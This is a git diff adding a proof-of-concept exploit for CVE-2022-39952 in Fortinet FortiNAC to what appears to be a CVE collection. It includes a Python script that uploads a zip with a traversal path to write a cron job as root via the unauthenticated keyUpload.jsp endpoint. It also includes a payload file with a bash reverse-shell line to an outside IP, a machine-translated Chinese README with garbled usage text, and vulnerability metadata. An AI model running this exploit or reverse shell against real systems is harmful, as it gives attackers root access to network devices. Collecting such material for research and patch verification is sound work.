diff --git a/cve/fortinac/2022/CVE-2022-39952/CVE-2022-39952.py b/cve/fortinac/2022/CVE-2022-39952/CVE-2022-39952.py new file mode 100644 index 0000000000000000000000000000000000000000..b5cd9247fbd7fe777cf93ec235aaec0ac5324f9b --- /dev/null +++ b/cve/fortinac/2022/CVE-2022-39952/CVE-2022-39952.py @@ -0,0 +1,29 @@ +#!/usr/bin/python3 +import argparse +import requests +import zipfile +import urllib3 +urllib3.disable_warnings() + + +def exploit(target): + url = f'https://{target}:8443/configWizard/keyUpload.jsp' + r = requests.post(url, files={'key': open('payload.zip', 'rb')}, verify=False) + if 'SuccessfulUpload' in r.text: + print(f'[+] Payload successfully delivered') + +def make_zip(payload_file): + fullpath = '/etc/cron.d/payload' + zf = zipfile.ZipFile('payload.zip', 'w') + zf.write(payload_file, fullpath) + zf.close() + print(f'[+] Wrote {payload_file} to {fullpath}') + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument('-t', '--target', help='The IP address of the target', required=True) + parser.add_argument('-f', '--file', help='The cronjob payload file', required=True) + args = parser.parse_args() + + make_zip(args.file) + exploit(args.target) diff --git a/cve/fortinac/2022/CVE-2022-39952/README.md b/cve/fortinac/2022/CVE-2022-39952/README.md new file mode 100644 index 0000000000000000000000000000000000000000..a8c77c69d0840c40a4769a6bee8055c996f1d4eb --- /dev/null +++ b/cve/fortinac/2022/CVE-2022-39952/README.md @@ -0,0 +1,45 @@ +#CVE-2022-39952 + +CVE-2022-39952的POC影响Fortinet FortiNAC + + + +此漏洞的默认配置编写cron作业以创建 + +反向外壳。确保更改“有效负载”文件以适合您的环境。 + + + +##技术分析 + +可以在我们的博客上找到漏洞和危害指标的技术根源分析: + +https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs + + + +##摘要 + +这个POC滥用keyUpload.jsp端点来实现任意文件写入。 + + + +##用途 + +```明文 + +root@kali:~/CVE-2022-39952#python3 CVE-2022-39952py--目标10.0.40.85--文件负载 + +[+]将负载写入/etc/cron.d/payload + +[+]有效负载已成功传递 + +``` + + + +##解决措施 + +按照PSIRT中的说明更新至最新版本 + +https://www.fortiguard.com/psirt/FG-IR-22-300 \ No newline at end of file diff --git a/cve/fortinac/2022/CVE-2022-39952/payload b/cve/fortinac/2022/CVE-2022-39952/payload new file mode 100644 index 0000000000000000000000000000000000000000..9c773e1696d7a5cb446af93a059157c03f7f7941 --- /dev/null +++ b/cve/fortinac/2022/CVE-2022-39952/payload @@ -0,0 +1 @@ +* * * * * root bash -i >& /dev/tcp/10.0.40.83/443 0>&1 diff --git a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml new file mode 100644 index 0000000000000000000000000000000000000000..98f30f02ba92e521ad0838c5cfcfde8a71db96b7 --- /dev/null +++ b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml @@ -0,0 +1,28 @@ +id: CVE-2022-39952 +source: https://github.com/horizon3ai/CVE-2022-39952 +info: + name: FortiNAC是Fortinet的网络访问控制增强安全结构的解决方案可见性、控制和自动响应连接到网络的所有内容。FortiNAC提供针对物联网威胁的保护,将控制扩展到第三方设备,以及协调自动响应到广泛的一系列社交活动。 + severity: critical + description: | + 该漏洞是由于FortiNAC keyUpload脚本中存在路径遍历漏洞,未经身份认证的远程攻击者可利用此漏洞向目标系统写入任意内容,最终可在目标系统上以 Root 权限执行任意代码。 + scope-of-influence: + FortiNAC version 9.4.0 + FortiNAC version 9.2.0 至 9.2.5 + FortiNAC version 9.1.0 至 9.1.7 + FortiNAC 8.8 所有版本 + FortiNAC 8.7 所有版本 + FortiNAC 8.6 所有版本 + FortiNAC 8.5 所有版本 + FortiNAC 8.3 所有版本 + reference: + - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs + - https://www.fortiguard.com/psirt/FG-IR-22-300 + - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-39952 + cwe-id: CWE-610 + cnvd-id: None + kve-id: None + tags: 远程代码执行漏洞 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index d83e8b4f7d85f277310e0c2a15fed2adec5b3dff..22b380b0cbcb7221f4b7d9e2905624b2a29d54f7 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -93,6 +93,8 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 + fortinac: + - CVE-2022-39952 redis: - CVE-2022-31144 java-spring: